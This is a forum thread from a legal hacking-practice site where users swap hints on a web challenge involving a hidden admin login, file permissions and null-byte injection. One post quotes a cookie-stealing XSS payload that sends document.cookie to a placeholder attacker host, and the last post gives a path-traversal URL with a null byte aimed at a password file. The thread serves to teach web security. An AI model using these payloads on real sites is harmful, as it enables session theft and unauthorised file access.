ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.

You are not logged in.

#1 2009-06-10 02:03:03

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Realistic 5

Hello guys (t0mmy9 and sOwl)

While i was trying to solve this challenge, i treied some weird thing.

I entered this into the search box: "Nice Site,  I think I'll take it.><script>document.location='http://some_attacker/cookie.cgi?' +document.cookie</script


The result i got was pretty confusing. I dont know if this is a bug or something else or something that can really get your site hacked. Please help. And if its a bug, please fix it before someone exploits it.

Here's the link to the page i got:

Gives away part of the challenge
xyberz09 smile

Offline

#2 2009-06-10 04:27:55

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Realistic 5

Thanks for repor­ting this, but this is an XSS prevention message. If you enter any form of html into the search box you get the

"Not Acceptable"

message. There is security to prevent XSS on the challenge already though, so it isnt even needed.


Site admin

Offline

#3 2009-06-10 08:12:36

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

take a look at everything in R5 site you should be able to find the way.

[spoiler]You don't have to look in the source-code in this challenge[/spoiler]

Offline

#4 2009-06-12 00:37:13

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Realistic 5

Hmm, i found an admin login page but i'm not sure how to get inside. It says information doesnt match with this file: %6C%6F%67%69%6E%2E%70%77%64


I'm trying to find the location of this file but i'm not sure where it is.



PS: By the way, does this challenge have any thing to do with NULL? Just wondering...

Offline

#5 2009-06-15 14:34:43

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

when a page is blank, probably means that the file is forbidden. if it doesn't exist then you will get  a "Page Not Found" error.

anyway, the location of the file you are trying to view is obvious.

PS: if you mean the [spoiler]Null Byte[/spoiler] yes, but you don't need it where you think. you use it to access the file but something else in the site is needed.

[spoiler]the "something else" is the most impor­tant part, look carefully.[/spoiler]

Offline

#6 2009-07-12 10:35:47

simms
Member
Registered: 2009-07-12
Posts: 1

Re: Realistic 5

ive found the login page, and ive noticed the file i need to view BUT...

[spoiler]Im not sure how to view it, i think i need to use null byte somewhere to view it but im not sure where.[/spoiler]

any help?

Thanks

Offline

#7 2009-07-13 06:52:59

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

You may can't view it directly but...what if you force the server do it for you?

Your final mission on this challenge is to search the site for this kind of Vulnerabilities.

Offline

#8 2009-09-30 03:09:59

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Realistic 5

I get a 403 Forbidden when trying to access login.pwd
I'm stumped. How do you access a file that you've denied permission?

I searched a little on Google but didn't find anything helpful. Any hints?

Offline

#9 2009-10-01 10:32:04

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Realistic 5

the file has been changed using unix perms so that users cant view the file. The server can still view the file though, so for example... if the file was opened using a php file the permissions would allow the file to be read by the script..


Site admin

Offline

#10 2009-10-08 13:51:22

Timse
Member
Registered: 2009-02-08
Posts: 18

Re: Realistic 5

Does this have anything to do with
Admin Edit:Gives away a huge part of the challenge.

Offline

#11 2009-10-08 14:00:02

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

Yes it does. you're almost done good job smile
Now find how you can use it

Offline

#12 2009-10-09 14:01:28

Timse
Member
Registered: 2009-02-08
Posts: 18

Re: Realistic 5

Sorry t0mmy9. Good that you edited my post.

Offline

#13 2009-11-06 00:33:29

xipander
Member
Registered: 2009-11-06
Posts: 1

Re: Realistic 5

I'm stuck on this one too.  Been at it forever.

I know the file I need to view.
I know the method/vulnerability I'm suppose to use.
I know of two places on the site that it'd be possible to use it. (one more so then the other)

I just can't figure out what I'm doing wrong.  I'm pretty positive I'm on the right track but I can't figure out what I'm missing.  Is there anyone I can pm or that can pm me to help with it?

Offline

#14 2009-11-06 02:02:50

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

actually I edited your post biggrin
btw xipander, you can pm me.

Offline

#15 2009-12-28 09:04:56

therock_wall
Member
Registered: 2008-03-16
Posts: 45

Re: Realistic 5

hi alll  i found the secret login page and also the file.. i also know that there are som UNIX file permission prob and need to use NULL byte but so how do i write the code.. i read the tutorial on this site.. so i need to download the page  and write the code or ..?
how do ui go ahead..?

Offline

#16 2010-01-01 05:59:17

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Realistic 5

If you have found the right page, then you should be able to do this from your browser by adding it to the correct URL


Site admin

Offline

#17 2010-01-01 20:20:22

therock_wall
Member
Registered: 2008-03-16
Posts: 45

Re: Realistic 5

ok i got the page the file and wen i try i see a blank page... so how do i move further.. how do i view the file.. i know som null byte .. but how do i inject the null byte into this..? plz.. som hint.. to move ahead..

Offline

#18 2010-01-03 03:05:25

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

You must find something in the Site that looks able to inject Null Byte (just by looking it).

so don't overthink this or look very hard.

Offline

#19 2010-03-31 12:57:16

xen
Member
Registered: 2010-03-14
Posts: 35

Re: Realistic 5

i got what i need but my friend john is just sat looking at me shaking his head with his arms crossed.

Offline

#20 2010-03-31 13:17:57

kjangwa
Member
Registered: 2010-03-27
Posts: 23

Re: Realistic 5

@xen, look closely at the last 2 chars,

john can't help you here.

Offline

#21 2010-06-07 06:36:36

brahim
Member
Registered: 2010-06-07
Posts: 1

Re: Realistic 5

I tried many combination using null bytes but none of them works. I don not have any clue on how it's coded. May I have a little hint please?

Offline

#22 2010-06-07 07:38:50

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

Have you found the right page? or you just "Null Byte" the pwd file?

It won't work unless you've found the injectable looking page.

Offline

#23 2010-06-07 07:39:25

BuRNeD
Member
Registered: 2009-03-21
Posts: 117

Re: Realistic 5

Have you found the right page? or you just "Null Byte" the pwd file?

It won't work unless you've found the injectable looking page.

Offline

#24 2010-06-16 03:15:06

Null Set
Member
Registered: 2010-06-14
Posts: 23

Re: Realistic 5

BuRNeD, post #2, you lie. smile haha


Null Set

Offline

#25 2011-02-21 18:31:55

phcoder
Member
Registered: 2011-02-09
Posts: 32

Re: Realistic 5

http://thisislegal.com/nc/details.php?p=../login.pwd%00
why doesn't this work? function pup(img) should open the file should it not??

Offline

Board footer

Powered by FluxBB